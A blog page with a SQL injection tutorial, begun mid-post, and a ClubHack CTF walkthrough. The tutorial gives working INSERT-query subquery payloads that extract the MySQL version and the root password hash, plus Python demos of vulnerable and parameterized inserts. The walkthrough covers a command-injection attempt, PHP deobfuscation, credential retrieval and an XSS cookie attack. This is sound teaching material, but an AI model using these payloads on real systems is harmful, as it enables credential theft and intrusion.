</div><div class="MsoNormal" style="text-indent: 0in;"><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-tsO6P7Pb7oU/Tyqsor19GiI/AAAAAAAAAiY/50GBMD2Bv2M/s1600/sqli-comments1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-tsO6P7Pb7oU/Tyqsor19GiI/AAAAAAAAAiY/50GBMD2Bv2M/s1600/sqli-comments1.jpg" /></a></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-bxxl_QRPXPo/Tyqst3ai8mI/AAAAAAAAAig/2zbe7m-O6lU/s1600/sqli-comments2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://2.bp.blogspot.com/-bxxl_QRPXPo/Tyqst3ai8mI/AAAAAAAAAig/2zbe7m-O6lU/s320/sqli-comments2.jpg" width="306" /></a></div><br />
</div><div class="MsoNormal" style="text-indent: 0in;"><span style="text-indent: 0in;">To see the result of the injected query, we need a place where the injected data is reflected back by the application. In this example, the comment details are printed back on the page.</span></div><div class="MsoNormal" style="text-indent: 0in;">So let’s start by injecting something that reveals information about the database server. We can place a SQL subquery in the position of a parameter value: we will insert the subquery (select version()), without the surrounding single quotes, in the position of the ‘email’ parameter.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-qMgSdC_EXBc/Tyqs5Qrs7yI/AAAAAAAAAio/HuHFNUSjPy4/s1600/sqli-comment3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-qMgSdC_EXBc/Tyqs5Qrs7yI/AAAAAAAAAio/HuHFNUSjPy4/s1600/sqli-comment3.jpg" /></a></div><br />
</div><div class="MsoNormal" style="text-indent: 0in;"><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-OvprAZe_rlI/Tyqs92mEpII/AAAAAAAAAiw/RWtiYrlgMHk/s1600/sqli-comments4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="304" src="http://4.bp.blogspot.com/-OvprAZe_rlI/Tyqs92mEpII/AAAAAAAAAiw/RWtiYrlgMHk/s320/sqli-comments4.jpg" width="320" /></a></div><br />
</div><div class="MsoNormal" style="text-indent: 0in;">We get the MySQL version. In the same way we can get other database details, such as the current user, the current database, etc. </div><div class="MsoNormal" style="text-indent: 0in;"><br />
Let’s try to get the password of user ‘root’ from the mysql.user table.</div><div class="MsoNormal" style="text-indent: 0in;"><br />
Injected Data:<br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace; text-indent: 0in;">test',(select password from mysql.user where user='root'),'test2')-- -</span></div><div class="MsoNormal" style="text-indent: 0in;"><br />
This gives error:<br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace; text-indent: 0in;">Subquery returns more than 1 row</span></div><div class="MsoNormal" style="text-indent: 0in;"><br />
Hmm, a scalar subquery may return only one row. We will use LIMIT to fetch one row at a time. Let’s craft the payload with LIMIT:<br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace; text-indent: 0in;">test',(select password from mysql.user where user='root' limit 0,1),'test2')-- -</span></div><div class="MsoNormal" style="text-indent: 0in;"><br />
This works and we now have password hash for user ‘root’:</div><div class="MsoNormal" style="text-indent: 0in;"><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-fqL9jqHnUr0/TyqtL-_6zII/AAAAAAAAAi4/5OCWs3B4ZKw/s1600/sqli-comments5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="51" src="http://1.bp.blogspot.com/-fqL9jqHnUr0/TyqtL-_6zII/AAAAAAAAAi4/5OCWs3B4ZKw/s400/sqli-comments5.jpg" width="400" /></a></div><br />
</div><div class="MsoNormal" style="text-indent: 0in;"></div><div class="MsoNormal" style="text-indent: 0in;"><br />
In this way, we can mine the database through SQL injection in an INSERT query using SQL subqueries.<br />
<br />
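The comment page above, rebuilt as a runnable example; this is added here and is not code from the post. It uses Python's sqlite3 module as a stand-in for the MySQL back end, with the post's comments table and a constructed `users` table holding fake hashes in place of mysql.user. The first function glues the submitted values into the statement the way the vulnerable page does, so the post's LIMIT payload in the name field lands a subquery result in the email column; the second binds the same values as parameters, so the payload is stored as an ordinary string. Two SQLite differences matter for reading it against the post: MySQL's version() is sqlite_version() here, and where MySQL raises "Subquery returns more than 1 row", SQLite silently takes the first row, so the LIMIT is only decisive on MySQL.<br />
<br />
```python
import sqlite3

# Constructed stand-in for the blog's MySQL schema: the comments table from the
# post, plus a `users` table that plays the role of mysql.user with fake hashes.
SCHEMA = """
CREATE TABLE comments (name TEXT, email TEXT, comment TEXT);
CREATE TABLE users (user TEXT, password TEXT);
INSERT INTO users VALUES ('root', 'FAKEHASH-0-constructed-for-demo');
INSERT INTO users VALUES ('root', 'FAKEHASH-1-second-root-row');
"""

# The payload from the post, placed in the `name` field: it closes the first
# literal, supplies the email column as a subquery, closes the VALUES list and
# comments out whatever the application appends after it.
PAYLOAD = "test',(select password from users where user='root' limit 0,1),'test2')-- -"


def fresh_db():
    """In-memory database with the constructed schema loaded."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_insert(conn, name, email, comment):
    """The comment page as the post describes it: values glued into the statement.

    Returns the statement that actually ran so the effect of the payload is visible.
    """
    sql = ("INSERT INTO comments (name, email, comment) "
           "VALUES ('%s','%s','%s')" % (name, email, comment))
    conn.execute(sql)
    conn.commit()
    return sql


def safe_insert(conn, name, email, comment):
    """Same insert with bound parameters: the driver never parses the values as SQL."""
    conn.execute("INSERT INTO comments (name, email, comment) VALUES (?, ?, ?)",
                 (name, email, comment))
    conn.commit()


def stored_rows(conn):
    return conn.execute("SELECT name, email, comment FROM comments").fetchall()


def demo():
    """Run the payload through both inserts and return what each one stored."""
    vuln = fresh_db()
    vulnerable_insert(vuln, PAYLOAD, "me@example.com", "nice post")
    safe = fresh_db()
    safe_insert(safe, PAYLOAD, "me@example.com", "nice post")
    return stored_rows(vuln), stored_rows(safe)


if __name__ == "__main__":
    leaked, literal = demo()
    print("vulnerable insert stored:", leaked)
    print("parameterized insert stored:", literal)
```
<br />
The reflected-output point from the post carries over unchanged: with the vulnerable insert, whatever the page later prints as the commenter's email is the subquery result, whereas with bound parameters the page prints the payload text itself. Escaping quotes is not the fix; the parameter binding is, because the value never reaches the SQL parser.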
The INSERT query is common in user registration pages. Let’s analyze an example. This example is taken from “<a href="http://www.irongeek.com/i.php?page=mutillidae/mutillidae-deliberately-vulnerable-php-owasp-top-10">Mutillidae</a>”, a well-known web application to learn security. A new user provides details such as username, password & signature in order to create an account with the forum/application. This data is then inserted into database using this query. The background SQL query looks like this:</div><div class="MsoNormal" style="text-indent: 0in;"><br />
</div><div class="MsoNormal" style="text-indent: 0in;"><span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">INSERT INTO accounts (username, password, mysignature) VALUES ('data', 'data', 'data');</span><br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;"><br />
</span></div><div class="MsoNormal" style="text-indent: 0in;">It’s the same as the last example, and we will be able to inject arbitrary values into the database using a single quote (') and the comment string (-- -):<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-8MLK9e8OCQk/TyqtfoPXxRI/AAAAAAAAAjA/5l7We1zgvA8/s1600/sqli-register.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="194" src="http://2.bp.blogspot.com/-8MLK9e8OCQk/TyqtfoPXxRI/AAAAAAAAAjA/5l7We1zgvA8/s320/sqli-register.JPG" width="320" /></a></div><br />
</div><div class="MsoNormal" style="text-indent: 0in;"><br />
</div><div class="MsoNormal" style="text-indent: 0in;">And the result is:</div><div class="MsoNormal" style="text-indent: 0in;"><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-ry_aItKRysM/TyqtngbQqlI/AAAAAAAAAjI/sRidphFhNso/s1600/sqli-register1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="23" src="http://1.bp.blogspot.com/-ry_aItKRysM/TyqtngbQqlI/AAAAAAAAAjI/sRidphFhNso/s320/sqli-register1.JPG" width="320" /></a></div><br />
</div><div class="MsoNormal" style="text-indent: 0in;"><br />
</div><div class="MsoNormal" style="text-indent: 0in;">Great!! The user is added. Now we can use the same sql subquery technique to inject sql queries and to get the data. But the question is where will be the returned data? <br />
<br />
There are 2 places where the app reflects the injected data.<br />
<br />
One place is the “Account created” message shown in the snapshot above, where the ‘username’ value is reflected. As we cannot control the opening single quote (') of the ‘username’ field, we cannot inject a subquery there whose result would be returned to us.<br />
<br />
We need to look for other places where our injected data is reflected back. As we have registered an account, let’s log in and check whether data from the inserted row is reflected anywhere.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-4goNf93MUCE/Tyqt8L1946I/AAAAAAAAAjQ/QFfDHIEh_44/s1600/sqli-register3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="95" src="http://3.bp.blogspot.com/-4goNf93MUCE/Tyqt8L1946I/AAAAAAAAAjQ/QFfDHIEh_44/s400/sqli-register3.JPG" width="400" /></a></div><br />
</div><div class="MsoNormal" style="text-indent: 0in;"><br />
</div><div class="MsoNormal" style="text-indent: 0in;">We can see the ‘signature’ parameter is reflected in the status message. So we need to inject our subqueries into the ‘signature’ value, and the returned data will appear in the status message.<br />
<br />
Let’s start with MySQL’s version(). The payload in the username field for this will be:<br />
<br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">test','test',(select version()))-- -</span></div><div class="MsoNormal" style="text-indent: 0in;"><br />
And the user is added successfully.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-ATJHwQkYdak/TyquDzgyFMI/AAAAAAAAAjY/tfcBlK1ukiU/s1600/sqli-register4.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="21" src="http://2.bp.blogspot.com/-ATJHwQkYdak/TyquDzgyFMI/AAAAAAAAAjY/tfcBlK1ukiU/s320/sqli-register4.JPG" width="320" /></a></div><br />
</div><div class="MsoNormal" style="text-indent: 0in;"><br />
</div><div class="MsoNormal" style="text-indent: 0in;"></div><div class="MsoNormal" style="text-indent: 0in;">Now log in with ‘test’ as both username & password and check the status message. It should contain the MySQL version.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-9ayvuVzz18Y/TyquWL_GZfI/AAAAAAAAAjg/rjoqxfImsp8/s1600/sqli-register5.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="82" src="http://1.bp.blogspot.com/-9ayvuVzz18Y/TyquWL_GZfI/AAAAAAAAAjg/rjoqxfImsp8/s320/sqli-register5.JPG" width="320" /></a></div><br />
</div><br />
Yes, it’s there and the injection is successful. Let’s try to get the password hash for the user ‘root’.<br />
<br />
Payload:<br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">test1','test1',(select password from mysql.user where user='root'))-- -</span><br />
<br />
And here comes the error:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-YWIdWJhnzTs/TyqucSIwLuI/AAAAAAAAAjo/VEOOCqBO9PQ/s1600/sqli-register6.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="22" src="http://3.bp.blogspot.com/-YWIdWJhnzTs/TyqucSIwLuI/AAAAAAAAAjo/VEOOCqBO9PQ/s400/sqli-register6.JPG" width="400" /></a></div><br />
<br />
We again need to use LIMIT so that the subquery returns only one row.<br />
<br />
Payload:<br />
<span style="background-color: #cccccc; font-family: 'Courier New', Courier, monospace;">test1','test1',(select password from mysql.user where user='root' LIMIT 0,1))-- -</span><br />
<br />
And we get the password hash for the user ‘root’.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-D5BWVv-yMqE/TyqujvxyRHI/AAAAAAAAAjw/xffPXXegPFU/s1600/sqli-register7.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="20" src="http://2.bp.blogspot.com/-D5BWVv-yMqE/TyqujvxyRHI/AAAAAAAAAjw/xffPXXegPFU/s400/sqli-register7.JPG" width="400" /></a></div><br />
<br />
<div class="MsoNormal" style="text-align: justify; text-indent: 0in;">That’s all. Other data can be extracted from the database in the same way.<br />
<br />
<b>Conclusion:</b><br />
1. Identify the injection point.<br />
2. Check where the injected data is visible.<br />
3. Use a subquery to embed SELECT queries inside the INSERT.<br />
4. Use LIMIT to get one row at a time.<br />
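As an added example (not Mutillidae’s code and not the author’s), here are the two registration paths side by side in Python, with an in-memory SQLite database standing in for MySQL so it runs offline: the concatenated INSERT the post exploits, where the username payload turns the mysignature slot into a subquery that is then reflected at login, and the parameterised INSERT that stores the identical input as inert text. The table, columns and payload are the post’s own; sqlite_version() replaces MySQL’s version(), and the helper names (register_vulnerable, register_safe, status_message, demo) are mine.

```python
import sqlite3

# Same columns as the Mutillidae accounts table in the post. SQLite stands in
# for MySQL here (assumption) so the example runs offline; MySQL's version()
# becomes SQLite's sqlite_version().
SCHEMA = "CREATE TABLE accounts (username TEXT, password TEXT, mysignature TEXT)"

# The post's username-field payload, with only the version function renamed.
PAYLOAD = "test','test',(select sqlite_version()))-- -"


def new_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    return conn


def register_vulnerable(conn, username, password, signature):
    """The registration query as the post describes it: user input is
    concatenated straight into the INSERT, so a quote in the username
    rewrites the VALUES list and '-- -' comments out the real tail."""
    sql = ("INSERT INTO accounts (username, password, mysignature) "
           f"VALUES ('{username}', '{password}', '{signature}');")
    conn.execute(sql)
    conn.commit()
    return sql  # returned so the caller can see the statement that actually ran


def register_safe(conn, username, password, signature):
    """The fix: bound parameters. The payload becomes an ordinary username
    string; the subquery text never reaches the SQL parser as SQL."""
    conn.execute(
        "INSERT INTO accounts (username, password, mysignature) VALUES (?, ?, ?)",
        (username, password, signature),
    )
    conn.commit()


def status_message(conn, username):
    """The reflection point the post found: the status line shows mysignature."""
    row = conn.execute(
        "SELECT mysignature FROM accounts WHERE username = ?", (username,)
    ).fetchone()
    return None if row is None else row[0]


def demo():
    # Vulnerable path: a row named 'test' exists and its signature is the
    # database version pulled in by the injected scalar subquery.
    vuln = new_db()
    ran = register_vulnerable(vuln, PAYLOAD, "pw", "sig")
    leaked = status_message(vuln, "test")

    # Safe path with the identical input: no row named 'test' exists, the
    # username column holds the payload verbatim and the signature is 'sig'.
    safe = new_db()
    register_safe(safe, PAYLOAD, "pw", "sig")
    return {
        "executed_sql": ran,
        "leaked_signature": leaked,
        "leak_is_db_version": leaked == sqlite3.sqlite_version,
        "safe_row_for_test": status_message(safe, "test"),
        "safe_signature_for_payload": status_message(safe, PAYLOAD),
    }
```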
<br />
I hope you liked this post. Suggestions and queries are welcome.</div><div class="MsoNormal" style="text-indent: 0in;"></div></div>AMol NAikhttp://www.blogger.com/profile/03701068634043898539noreply@blogger.com24tag:blogger.com,1999:blog-1544325078740292092.post-30590383307438425242011-12-19T22:47:00.000-08:002011-12-19T22:47:42.370-08:00ClubHack preCON CTF walkthrough<div dir="ltr" style="text-align: left;" trbidi="on"><a href="http://clubhack.com/2011/">ClubHack 2011</a>, India’s hacker conference, was held on 3-4 Feb 2011 at Pune, India. They ran a pre-conference hacking competition called WEBWAR, whose winners could win free entry to the ClubHack event. The winners also qualified to play Treasure Hunt, a physical CTF at the ClubHack conference.<br />
<br />
This post is a walkthrough of that preCON CTF challenge. After registering for the event, ClubHack provided the link to the CTF server, which hosted a website.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-pat4dHzHnSc/TvAlek63EYI/AAAAAAAAAas/KQ3kgbVadrc/s1600/main-site.JPG" imageanchor="1"><img border="0" height="267" src="http://4.bp.blogspot.com/-pat4dHzHnSc/TvAlek63EYI/AAAAAAAAAas/KQ3kgbVadrc/s400/main-site.JPG" width="400" /></a></div><br />
The site had a file download module and a login module. At first glance it seemed we needed to log in via the Login page, behind which there would be more to come. The download page might also let us download other files that could help with further attacks or with logging into the application.<br />
<br />
Let’s analyze the login module. <br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-7Yb4RtVsyvo/TvAlzstp9NI/AAAAAAAAAa4/26_aAGzeM3Y/s1600/login-page.JPG" imageanchor="1"><img border="0" height="162" src="http://2.bp.blogspot.com/-7Yb4RtVsyvo/TvAlzstp9NI/AAAAAAAAAa4/26_aAGzeM3Y/s320/login-page.JPG" width="320" /></a></div><br />
The login page uses the MD5 of the password string to authenticate. <br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-RxkmyHg5c-M/TvAmAn7FF2I/AAAAAAAAAbE/HyUeK73QDRo/s1600/userlogin-js-md5.JPG" imageanchor="1"><img border="0" height="297" src="http://2.bp.blogspot.com/-RxkmyHg5c-M/TvAmAn7FF2I/AAAAAAAAAbE/HyUeK73QDRo/s400/userlogin-js-md5.JPG" width="400" /></a></div><br />
The login did not seem vulnerable to SQL injection or authentication bypass. The only remaining attack would be brute force, which again proves nothing in a CTF. So we needed valid credentials to log in.<br />
<br />
The other page of interest was download.html.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-ODQsOJlbBTM/TvAmM8xEHwI/AAAAAAAAAbQ/TRu6k7aaT8Y/s1600/download-page.JPG" imageanchor="1"><img border="0" height="255" src="http://2.bp.blogspot.com/-ODQsOJlbBTM/TvAmM8xEHwI/AAAAAAAAAbQ/TRu6k7aaT8Y/s400/download-page.JPG" width="400" /></a></div><br />
The download link looks like this:<br />
<div style="background-color: #999999;">http://183.82.241.134/ClubHack/download.php?f=1.bin&oa=cf02eabd1afbca475abeb5760f16f0e2f4dfd929</div><br />
The download page requires 2 parameters: a filename and a hash. The hash was identified as SHA1 from its number of characters. After a few tests, it was clear that to download any file we needed to know both its filename and its SHA1 hash. Filenames can be guessed, but there was no clue as to how the hash for a particular file was created.<br />
<br />
Further inspection of the download.html source revealed execute.php mentioned in a comment. This seemed interesting.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-b566STIg9XA/TvAmaRun0JI/AAAAAAAAAbc/i_KjVuljHCk/s1600/source-of-download-page.JPG" imageanchor="1"><img border="0" height="125" src="http://3.bp.blogspot.com/-b566STIg9XA/TvAmaRun0JI/AAAAAAAAAbc/i_KjVuljHCk/s400/source-of-download-page.JPG" width="400" /></a></div><br />
When accessed, execute.php showed a form taking 2 parameters: Command & Filename.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-UqsR9agH0gM/TvAmnDOshUI/AAAAAAAAAbo/zjX1dA2Td-U/s1600/execute-page.JPG" imageanchor="1"><img border="0" height="191" src="http://3.bp.blogspot.com/-UqsR9agH0gM/TvAmnDOshUI/AAAAAAAAAbo/zjX1dA2Td-U/s320/execute-page.JPG" width="320" /></a></div><br />
The first thought that came to my mind was command injection. When tried with “;ifconfig”, it showed an error: “Sorry Babu, Test page! Wonly one command is allowed. Try again!”<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-e2Ul3a63LG4/TvAnH1kFloI/AAAAAAAAAb0/nkKoXJ9b-NM/s1600/execute-page-error.JPG" imageanchor="1"><img border="0" height="92" src="http://3.bp.blogspot.com/-e2Ul3a63LG4/TvAnH1kFloI/AAAAAAAAAb0/nkKoXJ9b-NM/s400/execute-page-error.JPG" width="400" /></a></div><br />
After several attempts, it was clear that this page was not vulnerable to any injection. It seemed to accept only one command, as the error message said. Then I looked for Linux commands which take a filename as a parameter. Commands like cat, less, more, tail, etc. fall into that category. <br />
<br />
None of these seemed to work. At the end, only the checksum commands were left. The command “sha1sum” worked with a valid filename.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-W8iTpSa_Z04/TvAnWAzJiGI/AAAAAAAAAcA/348Fsz1dLGo/s1600/execute-page-exe1.JPG" imageanchor="1"><img border="0" height="207" src="http://4.bp.blogspot.com/-W8iTpSa_Z04/TvAnWAzJiGI/AAAAAAAAAcA/348Fsz1dLGo/s400/execute-page-exe1.JPG" width="400" /></a></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-6Y0J0mxYlR0/TvAndPzWXEI/AAAAAAAAAcM/uZFvGkJCc8k/s1600/execute-page-exe2.JPG" imageanchor="1"><img border="0" height="168" src="http://1.bp.blogspot.com/-6Y0J0mxYlR0/TvAndPzWXEI/AAAAAAAAAcM/uZFvGkJCc8k/s400/execute-page-exe2.JPG" width="400" /></a></div><br />
Hmm!! Now things were pretty clear: identify the file to download, generate its SHA1 hash using execute.php, and then use download.php to download it.<br />
<br />
Let’s download UserLogin.php, as our goal is to get logged in. The following URL was used to download it:<br />
<div style="background-color: #999999;">http://183.82.241.134/ClubHack/download.php?f=UserLogin.php&oa=36ea1d4979568e6804b61b846ed855fe5d6f626c</div><br />
Now the only thing left was to analyze UserLogin.php, see how it authenticates a user, and log in. But this is a CTF and it won’t be that easy.<br />
<br />
UserLogin.php was obfuscated. A quick Google search revealed that the PHP obfuscator at <a href="http://www.fopo.com.ar/">http://www.fopo.com.ar</a> had been used. Now we needed to de-obfuscate it. Google didn’t reveal any online or offline tool for this obfuscation, so the only option left was to switch to manual mode.<br />
<br />
This is how UserLogin.php file looked:<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-Uou2C4hQ-tk/TvAnq49o6HI/AAAAAAAAAcY/-vWXg01RwJ0/s1600/UserLogin-php.JPG" imageanchor="1"><img border="0" height="291" src="http://2.bp.blogspot.com/-Uou2C4hQ-tk/TvAnq49o6HI/AAAAAAAAAcY/-vWXg01RwJ0/s400/UserLogin-php.JPG" width="400" /></a></div><br />
I used a local PHP server to de-obfuscate it. The first step was to change <b>eval()</b> to <b>echo()</b>, which gives us back the code to analyze further. The output looks like this:<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-eUaJFOhyyIc/TvAn_IeSWqI/AAAAAAAAAck/fBl90-U-qes/s1600/UserLogin-php1.JPG" imageanchor="1"><img border="0" height="198" src="http://1.bp.blogspot.com/-eUaJFOhyyIc/TvAn_IeSWqI/AAAAAAAAAck/fBl90-U-qes/s400/UserLogin-php1.JPG" width="400" /></a></div><br />
It looks like arbitrary strings are used to construct variable and function names. The only way to find out was to echo the arbitrary string values back and replace them with the original names in the code. The input file looks like this:<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-HL8qfleN67s/TvAoOWNuY5I/AAAAAAAAAcw/DYcGkjB9qaE/s1600/UserLogin-php2.JPG" imageanchor="1"><img border="0" height="243" src="http://2.bp.blogspot.com/-HL8qfleN67s/TvAoOWNuY5I/AAAAAAAAAcw/DYcGkjB9qaE/s400/UserLogin-php2.JPG" width="400" /></a></div><br />
And output of this is:<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-WHJ9RC7OdNE/TvAob6syQQI/AAAAAAAAAc8/2JODtTzy180/s1600/UserLogin-php3.JPG" imageanchor="1"><img border="0" height="185" src="http://4.bp.blogspot.com/-WHJ9RC7OdNE/TvAob6syQQI/AAAAAAAAAc8/2JODtTzy180/s400/UserLogin-php3.JPG" width="400" /></a></div><br />
The final code after replacing the names looks like this:<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-wIOHJkVR1gY/TvAomfwVoXI/AAAAAAAAAdI/w4-lGDqEpYY/s1600/UserLogin-php4.JPG" imageanchor="1"><img border="0" height="77" src="http://1.bp.blogspot.com/-wIOHJkVR1gY/TvAomfwVoXI/AAAAAAAAAdI/w4-lGDqEpYY/s400/UserLogin-php4.JPG" width="400" /></a></div><br />
Now it’s sort of readable. This code again has one eval(), which applies str_rot13, base64_decode & gzinflate to an input string.<br />
Let’s echo it instead of eval.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-3kqIRiOdOFc/TvAo3s6s1RI/AAAAAAAAAdU/vkiBtqj5fGE/s1600/UserLogin-php5.JPG" imageanchor="1"><img border="0" height="80" src="http://1.bp.blogspot.com/-3kqIRiOdOFc/TvAo3s6s1RI/AAAAAAAAAdU/vkiBtqj5fGE/s400/UserLogin-php5.JPG" width="400" /></a></div><br />
Now it’s much clearer. The PHP code takes the POST parameters username & password, then checks them against the contents of a file. So the file “\x6d\171\x68\141\x73\150\x65\163\x61\162\x65\156\x6f\164\x68\145\x72\145\x2e\164\x78\164” seems to hold the credentials. Echoing this string gives the exact filename.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-2aDcTROLeI8/TvApGWoHbaI/AAAAAAAAAdg/04gff6cXshw/s1600/UserLogin-php6.JPG" imageanchor="1"><img border="0" height="80" src="http://3.bp.blogspot.com/-2aDcTROLeI8/TvApGWoHbaI/AAAAAAAAAdg/04gff6cXshw/s400/UserLogin-php6.JPG" width="400" /></a></div><br />
Now let’s get this file. <br />
<br />
Sometimes when you work too much, your brain stops thinking in the right direction and you keep trying the wrong way. I was trying to download this file with download.php, which every time said “Invalid file type”. The error kept me thinking about bypassing the file-type check to get the file. As it’s a text file, we can simply browse to it directly.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-rsor-8vr9_I/TvApQw54I5I/AAAAAAAAAds/8io3OFYavxw/s1600/myhashesnothere-txt.JPG" imageanchor="1"><img border="0" height="67" src="http://2.bp.blogspot.com/-rsor-8vr9_I/TvApQw54I5I/AAAAAAAAAds/8io3OFYavxw/s400/myhashesnothere-txt.JPG" width="400" /></a></div><br />
Wow, now we have credentials. The password is already hashed, so tampering with the POST request helped to log in.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-j7KOryYRKak/TvApjQC7efI/AAAAAAAAAd4/uVhDdMyvvH0/s1600/Final-php.JPG" imageanchor="1"><img border="0" height="170" src="http://3.bp.blogspot.com/-j7KOryYRKak/TvApjQC7efI/AAAAAAAAAd4/uVhDdMyvvH0/s400/Final-php.JPG" width="400" /></a></div><br />
This looks like the final stage (Final.php): a form resembling an email client, used to send a vulnerability report to the Security & Management teams.<br />
<br />
This page has hardcoded email addresses in the “sendtomails” hidden parameter, and the subject is also hardcoded as “Security Updates”.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-Qv_anMvGsdI/TvAp6v7w39I/AAAAAAAAAeE/c5dNzXGQNYY/s1600/Final1.JPG" imageanchor="1"><img border="0" height="107" src="http://1.bp.blogspot.com/-Qv_anMvGsdI/TvAp6v7w39I/AAAAAAAAAeE/c5dNzXGQNYY/s400/Final1.JPG" width="400" /></a></div><br />
Both of these parameters are validated server-side; any tampering with them results in an error.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-MFCTUQR6B5k/TvAqVKl6S-I/AAAAAAAAAeQ/fn7qT5r9IMo/s1600/Final2.JPG" imageanchor="1"><img border="0" height="71" src="http://1.bp.blogspot.com/-MFCTUQR6B5k/TvAqVKl6S-I/AAAAAAAAAeQ/fn7qT5r9IMo/s400/Final2.JPG" width="400" /></a></div><br />
Only the Message field is left for the user. None of the server-side attacks such as SQL injection or command/code injection worked here. I tried for 2 days at this level. There were no clues available, and I felt lost.<br />
<br />
ClubHack tweeted about 2 flag submissions.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-FLhUQKOIGxc/TvAqsSadHCI/AAAAAAAAAeg/YH8E75MrYIg/s1600/twitter1.jpg" imageanchor="1"><img border="0" height="72" src="http://1.bp.blogspot.com/-FLhUQKOIGxc/TvAqsSadHCI/AAAAAAAAAeg/YH8E75MrYIg/s400/twitter1.jpg" width="400" /></a></div><br />
That confirmed there was a way past the Final.php page; somehow I hadn’t found it yet. One day before the conference, ClubHack released a hint via Twitter.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-jbCyhshtJmQ/TvAq4v5BHaI/AAAAAAAAAeo/5jkdCtnAkxI/s1600/twitter2.jpg" imageanchor="1"><img border="0" height="71" src="http://2.bp.blogspot.com/-jbCyhshtJmQ/TvAq4v5BHaI/AAAAAAAAAeo/5jkdCtnAkxI/s400/twitter2.jpg" width="400" /></a></div><br />
Now things got clearer. ClubHack was talking about cookies, which points to XSS. <a href="https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29">Cross-site scripting</a> is a client-side bug, and I had never heard of it being used in a CTF, where mostly server-side bugs are exploited to get the flag.<br />
<br />
Finally, taking the hint as a clue, I went looking for an XSS flaw and tried to exploit it. <br />
At first, script & img tags were filtered in the Message parameter, but the other tags were allowed. Using an a href tag with an event handler to execute JavaScript, I was able to access cookies, but that was not enough to pass the level.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-j9XIb06alqE/TvArD0CVv3I/AAAAAAAAAe0/4690AkuQ31Q/s1600/Final3.JPG" imageanchor="1"><img border="0" height="147" src="http://3.bp.blogspot.com/-j9XIb06alqE/TvArD0CVv3I/AAAAAAAAAe0/4690AkuQ31Q/s400/Final3.JPG" width="400" /></a></div><br />
